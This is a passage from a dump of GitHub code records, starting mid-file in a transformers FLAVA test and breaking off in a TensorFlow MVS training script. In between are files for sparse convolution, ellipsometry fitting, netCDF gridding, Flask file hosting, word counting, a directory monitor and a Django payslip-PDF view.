self._test_call_framework(np.ndarray, prepare_kwargs={\"numpify\": True})\n\n def test_call_numpy_4_channels(self):\n self.image_processing_class.num_channels = 4\n self._test_call_framework(np.ndarray, prepare_kwargs={\"numpify\": True})\n self.image_processing_class.num_channels = 3\n\n def test_call_pytorch(self):\n self._test_call_framework(torch.Tensor, prepare_kwargs={\"torchify\": True})\n\n def test_masking(self):\n # Initialize 
image_processing\n random.seed(1234)\n image_processing = self.image_processing_class(**self.image_processor_dict)\n image_inputs = self.image_processor_tester.prepare_image_inputs(equal_resolution=False, torchify=True)\n\n # Test not batched input\n encoded_images = image_processing(image_inputs[0], return_image_mask=True, return_tensors=\"pt\")\n self.assertEqual(encoded_images.bool_masked_pos.sum().item(), 75)\n\n def test_codebook_pixels(self):\n # Initialize image_processing\n image_processing = self.image_processing_class(**self.image_processor_dict)\n # create random PIL images\n image_inputs = self.image_processor_tester.prepare_image_inputs(equal_resolution=False)\n for image in image_inputs:\n self.assertIsInstance(image, PIL.Image.Image)\n\n # Test not batched input\n encoded_images = image_processing(image_inputs[0], return_codebook_pixels=True, return_tensors=\"pt\")\n expected_height, expected_width = self.image_processor_tester.get_expected_codebook_image_size()\n self.assertEqual(\n encoded_images.codebook_pixel_values.shape,\n (1, self.image_processor_tester.num_channels, expected_height, expected_width),\n )\n\n # Test batched\n encoded_images = image_processing(image_inputs, return_codebook_pixels=True, return_tensors=\"pt\")\n expected_height, expected_width = self.image_processor_tester.get_expected_codebook_image_size()\n self.assertEqual(\n encoded_images.codebook_pixel_values.shape,\n (\n self.image_processor_tester.batch_size,\n self.image_processor_tester.num_channels,\n expected_height,\n expected_width,\n ),\n )\n","repo_name":"huggingface/transformers","sub_path":"tests/models/flava/test_image_processing_flava.py","file_name":"test_image_processing_flava.py","file_ext":"py","file_size_in_byte":15669,"program_lang":"python","lang":"en","doc_type":"code","stars":115573,"dataset":"github-code","pt":"85"} +{"seq_id":"13738953870","text":"import warnings\nfrom typing import Dict, Optional, Tuple, Union\n\nimport torch\nfrom torch import nn\n\nfrom sige.utils import reduce_mask\nfrom .base import SIGEModule\nfrom .utils import activation\n\n\nclass Gather(SIGEModule):\n def __init__(\n self,\n conv: nn.Conv2d,\n block_size: Union[int, Tuple[int, int]],\n offset: Optional[Union[int, Tuple[int, int]]] = None,\n activation_name: str = \"identity\",\n activation_first: bool = False,\n verbose: bool = False,\n ):\n super(Gather, self).__init__()\n if isinstance(block_size, int):\n block_size = (block_size, block_size)\n\n n0 = max(block_size[0] - conv.kernel_size[0], 0) // conv.stride[0]\n n1 = max(block_size[1] - conv.kernel_size[1], 0) // conv.stride[1]\n b0 = n0 * conv.stride[0] + conv.kernel_size[0]\n b1 = n1 * conv.stride[1] + conv.kernel_size[1]\n if (b0, b1) != block_size:\n warnings.warn(\"Change the block size from (%d, %d) to (%d, %d)\" % (*block_size, b0, b1))\n\n self.model_stride = conv.stride\n self.kernel_size = conv.kernel_size\n\n self.block_size = (b0, b1)\n self.block_stride = ((n0 + 1) * conv.stride[0], (n1 + 1) * conv.stride[1])\n if offset is None:\n self.offset = conv.padding\n else:\n if isinstance(offset, int):\n offset = (offset, offset)\n self.offset = offset\n self.activation_name = activation_name\n self.activation_first = activation_first\n self.verbose = verbose\n\n self.load_runtime(\"gather\")\n\n self.input_res: Optional[Tuple[int, int]] = None\n self.active_indices: Optional[torch.Tensor] = None\n\n def forward(\n self, x: torch.Tensor, scale: Optional[torch.Tensor] = None, shift: Optional[torch.Tensor] = None\n ) -> torch.Tensor:\n 
self.check_dtype(x, scale, shift)\n self.check_dim(x, scale, shift)\n b, c, h, w = x.shape\n if self.mode == \"profile\":\n output = torch.full(\n (b * self.active_indices.size(0), c, *self.block_size),\n fill_value=x[0, 0, 0, 0],\n dtype=x.dtype,\n device=x.device,\n ) # create a dummy gather output depending on the input for profiling\n if scale is not None:\n output = output * scale[0, 0, 0, 0]\n if shift is not None:\n output = output + shift[0, 0, 0, 0]\n output = activation(output, self.activation_name)\n elif self.mode == \"full\":\n self.input_res = x.shape[2:]\n assert scale is None\n assert shift is None\n output = x\n elif self.mode == \"sparse\":\n device = x.device.type\n runtime = self.runtime[device]\n assert runtime is not None\n output = runtime(\n x.contiguous(),\n self.block_size[0],\n self.block_size[1],\n self.active_indices.contiguous(),\n None if scale is None else scale.contiguous(),\n None if shift is None else shift.contiguous(),\n self.activation_name,\n self.activation_first,\n )\n else:\n raise NotImplementedError(\"Unknown mode: [%s]!!!\" % self.mode)\n return output\n\n def set_mask(self, masks: Dict, cache: Dict, timestamp: int):\n if self.timestamp != timestamp:\n super(Gather, self).set_mask(masks, cache, timestamp)\n assert self.input_res is not None\n res = tuple(self.input_res)\n mask = masks[res]\n self.mask = mask\n key = (\"active_indices\", *res, *self.block_size, *self.block_stride, *self.offset)\n active_indices = cache.get(key, None)\n if active_indices is None:\n active_indices = reduce_mask(\n mask, self.block_size, self.block_stride, self.offset, verbose=self.verbose\n )\n cache[key] = active_indices\n self.active_indices = active_indices\n","repo_name":"lmxyy/sige","sub_path":"sige/nn/gather.py","file_name":"gather.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"85"} +{"seq_id":"38710990685","text":"\"\"\"\nBasic usage\n===========\n\nBasic usage of building a model and fitting it to measurement data of SiO2 on Si.\n\n\"\"\"\n# %%\nimport elli\nfrom elli.fitting import ParamsHist, fit\n\n# sphinx_gallery_thumbnail_path = '_static/basic_usage.png'\n\n\n# %%\n# Reading data\n# ------------------------\n#\n# We load the data from the generated\n# `NeXus file `_\n# and select the angle we want to analyse.\n# You may set the ANGLE constant to 50 or 60 to select\n# other angles of incidence from the example file.\n# Additionally, we're cutting the wavelength axis to be in between 210 nm and 800 nm.\n# This is because we're using literature values for Si,\n# which are only defined in this wavelength range.\nANGLE = 70\npsi_delta = elli.read_nexus_psi_delta(\"SiO2onSi.ellips.nxs\").loc[ANGLE][210:800]\n\n# %%\n# Setting parameters\n# ------------------------\n#\n# As an example we analyse an oxidation layer of SiO2 on Si.\n# Prior to defining our model, we have to set the parameters we want to use.\n# We're going to use a :ref:`Cauchy model ` for SiO2 and load the Si values from\n# `literature values `_.\n# The parameter names can be choosen freely,\n# but you have to use the exact same name in the later model definition.\n# The package uses lmfit as fitting tool and you may refer to their\n# `documentation `_\n# for details on parameter definition.\n\nparams = ParamsHist()\nparams.add(\"SiO2_n0\", value=1.452, min=-100, max=100, vary=False)\nparams.add(\"SiO2_n1\", value=36.0, min=-40000, max=40000, vary=False)\nparams.add(\"SiO2_n2\", value=0, min=-40000, 
max=40000, vary=False)\nparams.add(\"SiO2_k0\", value=0, min=-100, max=100, vary=False)\nparams.add(\"SiO2_k1\", value=0, min=-40000, max=40000, vary=False)\nparams.add(\"SiO2_k2\", value=0, min=-40000, max=40000, vary=False)\nparams.add(\"SiO2_d\", value=20, min=0, max=40000, vary=True)\n\n# %%\n# Load silicon dispersion from the refractiveindexinfo database\n# -------------------------------------------------------------\n# You can load any material from the index\n# `refractiveindex.info `__, which is\n# embedded into the software (so you may use it offline, too). Here, we\n# are interested in the literature values for the silicon substrate.\n# First we need to load the database with ``rii_db = elli.db.RII()`` and\n# then we can query it with ``rii_db.get_mat(\"Si\", \"Aspnes\")`` to load\n# this\n# `entry `__.\nrii_db = elli.db.RII()\nSi = rii_db.get_mat(\"Si\", \"Aspnes\")\n\n\n# %%\n# Building the model\n# ------------------------\n#\n# For simple parameter estimation,\n# the fit decorator (**@fit**) in conjuction with the model definition is used.\n# The fitting decorator takes a pandas dataframe containing\n# the psi/delta measurement data (**psi_delta**) and the model parameters (**params**) as an input.\n# It then passes the wavelength from measurement dataframe (**lbda**)\n# and the parameters to the actual model function.\n#\n# Inside the model function the optical model is built,\n# i.e. the Si literature values are loaded\n# and the fitting parameters are filled into the Cauchy dispersion.\n# For details on how to insert data into the Cauchy model or other optical dispersion models,\n# you may refer to the documentation of pyElli.\n# Please keep in mind that the parameters you use here\n# have to be defined in the parameter object **param**.\n#\n# From the dispersion model isotropic materials are generated\n# (could also be an anisotropic material, refer to the docs for an overview).\n# This is done by calling the :code:`elli.IsotropicMaterial(...)` function\n# with a dispersion model as a parameter\n# or simply calling :code:`.get_mat()` on a dispersion model.\n# These two approaches are equivalent.From these materials the layer is build,\n# which only consists of the SiO2 layer in this example.\n# The final structure consists of an incoming half-space,\n# the layers and an outgoing half space. Specifically,\n# typically the light is coming from air and finally gets absorbed by the bulk material,\n# in our example this is Si, i.e. 
we call :code:`elli.Structure(elli.AIR, Layer, Si)`.\n#\n# To provide simulated data, we have to evaluate the structure\n# by calling the :code:`evaluate(...)` function,\n# which takes the experimental wavelength array **lbda**, **ANGLE** under which the experiment\n# was performed and the solver to be used to solve the transfer-matrix problem.\n# Here, we use a simple 2x2 matrix approach,\n# which splits the interaction in s and p-parts and therefore cannot account for anisotropy.\n# There exist 4x4 matrix solvers as well.\n# You may refer to the :ref:`solver documentation ` for further details.\n#\n# Executing the cell below in a jupyter notebook displays a comparison of the simulated Ψ / Δ values\n# at the current parameter values with their measured counterparts.\n# Additionally, input fields for each model parameter are shown.\n# You may change the parameters and the calcualted data will change accordingly.\n# For clarification the modeled data is shown with `_calc` postfix in the legend.\n@fit(psi_delta, params)\ndef model(lbda, params):\n # Generate the cauchy model from the current lmfit parameters\n SiO2 = elli.Cauchy(\n params[\"SiO2_n0\"],\n params[\"SiO2_n1\"],\n params[\"SiO2_n2\"],\n params[\"SiO2_k0\"],\n params[\"SiO2_k1\"],\n params[\"SiO2_k2\"],\n ).get_mat()\n # get_mat() generates an IsotropicMaterial from the dispersion relation\n\n # Construct the layers you expect in your sample\n # Here, it only consists of one layer SiO2 in between air and Si.\n # We build the structure coming from air, through the layers,\n # represented as an array, and having Si as bulk material.\n structure = elli.Structure(\n elli.AIR, # Input medium\n [elli.Layer(SiO2, params[\"SiO2_d\"])], # Overlayer structure\n Si,\n ) # Output medium / Substrate\n\n # The model should return the evaluation of the structure at the experimental wavelengths lbda,\n # the experimental angle ANGLE and it should define a solver to calculate the transfer matrix.\n return structure.evaluate(lbda, ANGLE, solver=elli.Solver2x2)\n\n\n# %%\n# Fit and plot fit results\n# ------------------------\n#\n# The fit of the data can be executed by calling the fit() function on the model function,\n# which automatically gets attached by the @fit decorator in the cell above.\n# The following cell basically executes the fit and plots\n# a comparison between the measurement and fitted data.\nfit_stats = model.fit()\nmodel.plot()\n\n# %%\n# Extracting the optical properties from the fit\n# ----------------------------------------------\n#\n# Since we want to extract the dispersion relation of a layer in our measured stack,\n# we can use our fitted parameters.\n# The fit parameters are contained in the fits output :code:`params` attribute,\n# i.e. :code:`fit_stats.params` for our example.\n# We can use it to call our dispersion relation we used in our model\n# (here it is a Cauchy dispersion relation)\n# and fill in our fitted value.\n# By calling :code:`get_dielectric_df()` we can get the dielectric function of the material,\n# which is plotted here as an example. 
:code:`get_dielectric_df` uses a default wavelength range\n# which can also be changed by inputting a wavelength array as a parameter.\nfitted_model = elli.Cauchy(\n fit_stats.params[\"SiO2_n0\"],\n fit_stats.params[\"SiO2_n1\"],\n fit_stats.params[\"SiO2_n2\"],\n fit_stats.params[\"SiO2_k0\"],\n fit_stats.params[\"SiO2_k1\"],\n fit_stats.params[\"SiO2_k2\"],\n)\n\nfitted_model.get_dielectric_df().plot(backend=\"plotly\")\n\n# %%\n# We can also call :code:`get_refractive_index_df()`\n# to get the refractive index of the material as dataframe.\nfitted_model.get_refractive_index_df().plot(backend=\"plotly\")\n\n# %%\n# If you want to write your data to a file you simply call pandas :code:`to_csv(...)`\n# function to write a csv file, i.e. for the dielectric function this writes as\nfitted_model.get_dielectric_df().to_csv(\"SiO2_diel_func.csv\")\n\n# %%\n# You may also access a single value of your optical model\nfit_stats.params[\"SiO2_n0\"].value\n\n# %%\n# Our simply print the fitted values in a list together with their fitting errors\nfit_stats.params\n\n# %%\n# Show fit statistics\n# --------------------\n# Now, we may also print out the fit statictics from the model fit in the cell above.\n# The fit statistics are simple `lmfit fit statistics `_, too.\n# Typically, one uses chi square values as a figure of merit for the fit quality.\n# It is stored in the chisqr attribute of the fit_stats variable we defined above.\nfit_stats.chisqr\n\n# %%\n# We can print the full fit statistics, too.\nfit_stats\n\n# %%\n# References\n# ----------\n# `Here `_\n# you can find the latest jupyter notebook and data files of this example.\n","repo_name":"PyEllips/pyElli","sub_path":"examples/gallery/plot_01_basic_usage.py","file_name":"plot_01_basic_usage.py","file_ext":"py","file_size_in_byte":9119,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"85"} +{"seq_id":"31173263682","text":"B\"\"\" Create a single netCDF file contaning gridded data.\n structure of file:\n - dimensions\n lat\n lon\n time\n pleve\n\"\"\"\n\nimport os,sys\n\nimport xarray as xr\nimport numpy as np\nimport pandas as pd\n\n\n\ndef initialize(variable = '' ):\n \n global Lat, Lon, Plev, Hour, Time, files, gridded_files_dir, hours, var, out_dir\n \n var = variable\n out_dir = '/raid60/scratch/federico/GRIDDED_FILES_FEB2021/'\n \n \"\"\" Directory with gridded files, list of files \"\"\"\n \n gridded_files_dir = '/raid60/scratch/federico/GRIDDED_FILES_FEB2021/' + var + '/'\n \n \n files = os.listdir(gridded_files_dir)\n \n \"\"\" Creating the latitude and longitude lists \"\"\"\n lat = list(set( [ float(f.split('_')[5]) for f in os.listdir(gridded_files_dir) ] ) ) \n lat.sort()\n lon = list(set( [ float(f.split('_')[6]) for f in os.listdir(gridded_files_dir) ] ) ) \n lon.sort()\n \n \n Lat = np.array(lat)\n Lon = np.array(lon)\n Plev = np.array([1000, 2000, 3000, 5000, 7000, 10000, 15000, 20000, 25000, 30000, 40000, 50000, 70000, 85000, 92500, 100000])\n Hour = np.array([0,12])\n \n \"\"\" Creating hour array (easier to find time in the df ) \"\"\"\n df = xr.open_dataset( gridded_files_dir + '/' + files[0] , engine = 'h5netcdf', decode_times = True ).to_dataframe()\n q = pd.arrays.DatetimeArray( df['time'][:] )\n hours = q.hour\n df['hour'] = hours\n \n \"\"\" Total length of data \"\"\"\n Time = df.loc [ (df['hour'] == 12) & (df['plev']==100000) ]['time'].values # just need one plev per hour, i.e. 
this is the list of distinct time stamps\n Time = pd.arrays.DatetimeArray(Time)\n Time = Time.date\n Time = Time.astype(np.datetime64)\n print('*** Finished initialization ***')\n\n\n#Lat = Lat[:3]\n#Lon = Lon[:5]\n\ndef make_xarray():\n res_average = np.empty([len(Lat) , len(Lon), len(Hour) , len(Plev), len(Time) ] ) # 2*16 is 2 hours x pressure levels , empty placeholder \n res_anomaly = np.empty([len(Lat) , len(Lon), len(Hour) , len(Plev), len(Time) ] ) # 2*16 is 2 hours x pressure levels , empty placeholder \n \n #for lat in range(len(Lat)):\n # for lon in range(len(Lon)):\n for lat in Lat:\n for lon in Lon:\n box_file = [f for f in files if '_' + str(lat) +'_'+str(lon) in f ][0] # search for the grid file for those lat and lon \n print(lat , ' ' , lon , ' ' , box_file )\n \n #if '24_20_lat' in box_file:\n # print('check' , box_file )\n #else:\n # continue\n # print(0)\n df = xr.open_dataset( gridded_files_dir + '/' + box_file , engine = 'h5netcdf', decode_times = True ).to_dataframe()\n #q = pd.arrays.DatetimeArray( df['time'][:] )\n #hh = q.hour\n df['hour'] = hours # it is the same for each dataframe \n\n for p in range(len(Plev)):\n a = 0 # read here input data \n for h in range(len(Hour)):\n print('processing lat lon press hour : ', lat,lon,p,h)\n \n df_red = df.loc[ (df['plev'] == Plev[p] ) & ( df['hour'] == Hour[h] )]\n if var == 'ta':\n values = df_red[var + '_average_bias'].values\n ano = df_red[var + '_anomaly_bias'].values\n else:\n values = df_red[var + '_average'].values\n ano = df_red[var + '_anomaly'].values \n\n \n res_average[np.where(Lat == lat),np.where(Lon == lon),h,p,:] = values.astype(float)\n res_anomaly[np.where(Lat == lat),np.where(Lon == lon),h,p,:] = ano.astype(float)\n \n return res_average, res_anomaly\n\n\n\ndef write_gridded_netCDF(res_average, res_anomaly):\n \"\"\" Writing the output netCDF files using xarray \"\"\"\n da = xr.Dataset ( { var + '_average' : ( ['lat','lon','hour','pressure','time'] , res_average ), # variables \n var + '_anomaly' : ( ['lat','lon','hour','pressure','time'] , res_anomaly ) },\n \n coords = dict( lat = Lat ,\n lon = Lon,\n hour = Hour,\n pressure = Plev,\n time = Time, \n ),\n )\n \n da.attrs['title'] = 'CEUAS gridded data'\n da.attrs['institution'] = 'University of Vienna',\n da.attrs['source'] = 'Institut fuer Meteorologie und Geophysik, leopold.haimberger@univie.ac.at'\n \n \n attr_dic = { 'ta' : {'variable': 'Air temperature' , 'units': 'Kelvin [K]' },\n 'wind_speed' : {'variable': 'Wind speed' , 'units': 'meter per second [m/s]' },\n 'dew_point_temperature' : {'variable': 'Dew point temperature' , 'units': 'Kelvin [K]' },\n 'hur' : {'variable': 'Relative humidity' , 'units': 'unitless [0-1]' },\n 'hus' : {'variable': 'Specific humidity' , 'units': 'kilograms per kilogram\t[kg/kg]' },\n \n \n }\n \n\n da.attrs['variable'] = attr_dic[var]['variable']\n da.attrs['units'] = attr_dic[var]['units']\n \n da.lat.attrs['variable'] = 'Latitude'\n da.lat.attrs['units'] = 'Degrees'\n \n da.lon.attrs['variable'] = 'Longitude'\n da.lon.attrs['units'] = 'Degrees'\n \n da.time.attrs['variable'] = 'Timestamp'\n #da.time.attrs['units'] = 'Degrees'\n \n da.hour.attrs['variable'] = 'Hour'\n da.hour.attrs['units'] = 'Hour from 00'\n \n da.pressure.attrs['variable'] = 'Pressure'\n da.pressure.attrs['units'] = 'Pascal [Pa]'\n \n from datetime import datetime\n \n now = datetime.now()\n dt = now.strftime(\"%d/%m/%Y %H:%M:%S\")# dd/mm/YY H:M:S\n da.attrs['history'] = dt \n \n \"\"\" Setting the encoding for compression \"\"\"\n enc = {}\n for v 
in da:\n enc[v] = {'compression': 'gzip' }\n \n print(enc)\n da.to_netcdf( out_dir + '/CEUAS_' + var +'_gridded.nc' , format='netCDF4', engine='h5netcdf', encoding= enc )\n print('**Written file: ' , out_dir + '/CEUAS_' + var +'_gridded.nc *** ' )\n\n\n \n \n\"\"\" Select here the variable to process.\n Will locate the proper directory and file list \"\"\"\n\nvar = 'ta' # ta, dew_point_temperature, wind_speed, hur, hus \n#Lat = Lat[:3]\n#Lon = Lon[:5]\nif __name__ == '__main__':\n\n vars = ['ta','dew_point_temperature','wind_speed','hur','hus']\n for var in vars:\n dummy = initialize(variable = var)\n #Lat = Lat[:5] ### uncomment for testing \n #Lon = Lon[:3] \n res_average, res_anomaly = make_xarray()\n write_gridded_netCDF(res_average, res_anomaly )\n\n\n\n\n\n","repo_name":"MBlaschek/CEUAS","sub_path":"CEUAS/public/gridding/make_netCDF_griddedfile.py","file_name":"make_netCDF_griddedfile.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"9323028425","text":"import os\nfrom datetime import datetime\nimport time\n\nimport hashlib\nfrom flask_login import current_user\nfrom flask import flash, redirect, url_for, send_file\nfrom sqlalchemy import desc\n\nfrom app import app, db\nfrom app.models import File, FilePath\n\n\nclass FileActions:\n\n def delete_file(self, file):\n file_name = file.filename\n file_path = FilePath.query.filter_by(id=file.filepath_id).first()\n db.session.delete(file)\n db.session.commit()\n file_path_file = File.query.filter_by(filepath_id=file_path.id).first()\n if not file_path_file:\n os.remove(file_path.filepath)\n os.removedirs(file_path.filepath[:-26])\n db.session.delete(file_path)\n db.session.commit()\n flash('File \"' + file_name + '\" is deleted', 'info')\n return redirect(url_for('user_files'))\n\n def download_file(self, file_id):\n file = File.query.filter_by(id=file_id).first()\n file_path = FilePath.query.filter_by(id=file.filepath_id).first().filepath\n file_name = file.filename\n if current_user.is_anonymous and not file.is_shared:\n flash('Access Denied!', 'danger')\n return redirect(url_for('login'))\n elif (current_user.is_anonymous and file.is_shared) or current_user.id == file.user_id or file.is_shared:\n return send_file(file_path, as_attachment=True, attachment_filename=file_name)\n else:\n return redirect(url_for('user_files'))\n\n def file_list(self, form):\n if form.validate_on_submit() and form.file_name.data != '':\n files = File.query.filter(File.user_id == current_user.id,\n File.filename.like(f'%{form.file_name.data}%'))\n else:\n files = File.query.filter_by(user_id=current_user.id).order_by(desc(File.uploadtime))\n return files\n\n def sharing(self, user_id, file_id, share: bool):\n file = File.query.filter_by(id=file_id).first()\n if user_id == file.user_id:\n file.is_shared = True if share else False\n return db.session.commit()\n else:\n return flash('Error', 'danger')\n\n def upload_file(self, request):\n if request.method == 'POST':\n file, temp_file_path = self._check_file(request)\n if file:\n file_exists, file_path = self._check_file_exists(file)\n if file_exists:\n os.remove(temp_file_path)\n filepath_id = FilePath.query.filter_by(filepath=file_path).first().id\n is_user_file = File.query.filter_by(filepath_id=filepath_id, user_id=current_user.id).first()\n if is_user_file:\n exists_name = is_user_file.filename\n flash('File already exists with name \"' + exists_name + '\"', 'warning')\n else:\n user_file = 
File(filepath_id=filepath_id, filename=file.filename, uploadtime=datetime.utcnow(),\n is_shared=False, user_id=current_user.id)\n db.session.add(user_file)\n db.session.commit()\n flash('File LINK added', 'success')\n else:\n os.rename(temp_file_path, file_path)\n filepath = FilePath(filepath=file_path)\n db.session.add(filepath)\n filepath = FilePath.query.filter_by(filepath=file_path).first()\n user_file = File(filepath_id=filepath.id, filename=file.filename, uploadtime=datetime.utcnow(),\n is_shared=False,\n user_id=current_user.id)\n db.session.add(user_file)\n db.session.commit()\n flash('File added', 'success')\n return redirect(request.url)\n\n def _check_file(self, request):\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part', 'warning')\n return redirect(request.url)\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file', 'warning')\n return redirect(request.url)\n temp_file_path = os.path.join(app.config['UPLOAD_FOLDER'], str(time.time()).replace('.', '-'))\n file.save(temp_file_path)\n return file, temp_file_path\n\n def _check_file_exists(self, file):\n md5_filename = hashlib.md5(file.read()).hexdigest()\n dir_for_file = os.path.join(app.config['UPLOAD_FOLDER'], md5_filename[0:3], md5_filename[3:6])\n if not os.path.exists(dir_for_file):\n os.makedirs(dir_for_file)\n new_filename = md5_filename[7:]\n file_path = os.path.join(dir_for_file, new_filename)\n return os.path.exists(file_path), file_path\n","repo_name":"arartemtem/flask-file-hosting","sub_path":"app/service/file_actions.py","file_name":"file_actions.py","file_ext":"py","file_size_in_byte":5039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8757926678","text":"with open('output.txt') as inf:\n\tstring = inf.read().replace('\\n',' ').lower()\n\td = {}\n\tbig_key = \"\"\n\tbig_val = 1\n\tfor word in string.split():\n\t\tif word not in d.keys():\n\t\t\td[word] = 1\n\t\telse:\n\t\t\td[word] += 1\n\t\t\tif d[word] > big_val:\n\t\t\t\tbig_val = d[word]\n\t\t\t\tbig_key = word\n\t\t\telif d[word] == big_val and big_key > word:\n\t\t\t\tbig_val = d[word]\n\t\t\t\tbig_key = word\n\t\t\n\tprint(big_key, big_val)\n","repo_name":"nurSaadat/pythonLearning","sub_path":"oftenword_fileread.py","file_name":"oftenword_fileread.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"3378706780","text":"import manage\nimport time\nimport config\n\ndef control_loop():\n \"\"\"\n Main program loop. Refers to state of files in target directory at regular (five\n second) intervals and stores any changes. 
\n\n Arguments:\n dir_path (str): path of target directory\n \"\"\"\n configure = config.ConfigManager()\n dir_path = configure.get_target_path()\n temp_path = configure.get_temp_path()\n interval = configure.get_interval()\n\n try:\n manager = manage.FileManager(dir_path, temp_path)\n except manage.InvalidDirectoryError:\n return\n\n while True:\n time.sleep(interval)\n interval = configure.get_interval()\n active = configure.get_active()\n if dir_path != configure.get_target_path():\n dir_path = configure.get_target_path()\n manager.set_target_directory(dir_path)\n print(f\"Change to {dir_path}\")\n if not active or not manager.has_changed():\n print(f\"No changes (Active: {active})\")\n continue\n changes = manager.store_changes()\n print(changes)\n\n\nif __name__ == \"__main__\":\n control_loop()\n","repo_name":"LiamGraham/verdite","sub_path":"src/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"38563788338","text":"from django.shortcuts import render\nfrom .models import staff\n\n#for geting the pdf \nimport os\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nfrom django.contrib.staticfiles import finders\n\n# Create your views here.\n\ndef home(request):\n getstaff = staff.objects.all()\n\n context = {\n 'getstaff':getstaff\n }\n return render(request,'home.html',context)\n\n\ndef payslip(request,pk):\n pay = staff.objects.get(id=pk)\n template_path = 'payslip.html'\n logo = finders.find('logo.jpeg')\n context = {\n 'pay':pay,\n 'static':{\n 'logo':logo\n },\n }\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'filename=\"report.pdf\"'\n template = get_template(template_path)\n html = template.render(context)\n pisa_status = pisa.CreatePDF(\n html, dest=response)\n # if error then show some funny view\n if pisa_status.err:\n return HttpResponse('We had some errors
<pre>' + html + '</pre>
')\n return response\n#This code will convert the HTML to PDF\n\n\n\n\n","repo_name":"lagrandecode/oraclepayslip","sub_path":"payslip/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41103188765","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\nTraining script.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"]='2'\nimport time\nimport sys\nimport math\nimport argparse\nfrom random import randint\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python import debug as tfdbg\nfrom PIL import Image\n#from scipy.misc import imread\nfrom imageio import imread\nimport matplotlib.pyplot as plt\n\nfrom preprocess import *\nfrom model import *\n\n# paths\ntf.app.flags.DEFINE_string('data_root', 'X:/liujin_densematching/MVS_traindata/meitan_RS/train', \"\"\"Path to whu train dataset.\"\"\")\n\ntf.app.flags.DEFINE_string('log_dir', 'MVS_TRANING/tf_log',\n \"\"\"Path to store the log.\"\"\")\ntf.app.flags.DEFINE_string('model_dir', 'MVS_TRANING/tf_model',\n \"\"\"Path to save the model.\"\"\")\ntf.app.flags.DEFINE_boolean('use_pretrain', False,\n \"\"\"Whether to train.\"\"\")\ntf.app.flags.DEFINE_integer('ckpt_step', 110000,\n \"\"\"ckpt step.\"\"\")\n\n# input parameters\ntf.app.flags.DEFINE_integer('view_num', 3, \n \"\"\"Number of images (1 ref image and view_num - 1 view images).\"\"\")\ntf.app.flags.DEFINE_integer('max_d', 128,\n \"\"\"Maximum depth step when training.\"\"\")\ntf.app.flags.DEFINE_integer('max_w', 768, \n \"\"\"Maximum image width when training.\"\"\")\ntf.app.flags.DEFINE_integer('max_h', 384, \n \"\"\"Maximum image height when training.\"\"\")\ntf.app.flags.DEFINE_float('sample_scale', 0.5,\n \"\"\"Downsample scale for building cost volume.\"\"\")\ntf.app.flags.DEFINE_float('interval_scale', 2,\n \"\"\"Downsample scale for building cost volume.\"\"\")\ntf.app.flags.DEFINE_float('interval', 0.1, \n \"\"\"Depth interval for building cost volume.\"\"\")\n\n# training parameters\ntf.app.flags.DEFINE_integer('num_gpus', 1, \n \"\"\"Number of GPUs.\"\"\")\ntf.app.flags.DEFINE_integer('batch_size', 1, \n \"\"\"Training batch size.\"\"\")\ntf.app.flags.DEFINE_integer('epoch', 21, \n \"\"\"Training epoch number.\"\"\")\ntf.app.flags.DEFINE_float('val_ratio', 0, \n \"\"\"Ratio of validation set when splitting dataset.\"\"\")\ntf.app.flags.DEFINE_float('base_lr', 0.001,\n \"\"\"Base learning rate.\"\"\")\ntf.app.flags.DEFINE_integer('display', 1,\n \"\"\"Interval of loginfo display.\"\"\")\ntf.app.flags.DEFINE_integer('stepvalue', 5000,\n \"\"\"Step interval to decay learning rate.\"\"\")\ntf.app.flags.DEFINE_integer('snapshot', 5000,\n \"\"\"Step interval to save the model.\"\"\")\ntf.app.flags.DEFINE_float('gamma', 0.9,\n \"\"\"Learning rate decay rate.\"\"\")\n\nFLAGS = tf.app.flags.FLAGS\n\nclass MVSGenerator:\n \"\"\" data generator class, tf only accept generator without param \"\"\"\n def __init__(self, sample_list, view_num):\n self.sample_list = sample_list\n self.view_num = view_num\n self.sample_num = len(sample_list)\n self.counter = 0\n \n def __iter__(self):\n while True:\n for data in self.sample_list: \n start_time = time.time()\n\n ###### read input data ######\n images = []\n cams = []\n for view in range(self.view_num):\n image = image_augment(Image.open(data[2 * view]))\n image = center_image(image)\n cam = tr_load_cam(open(data[2 * view + 1]), 
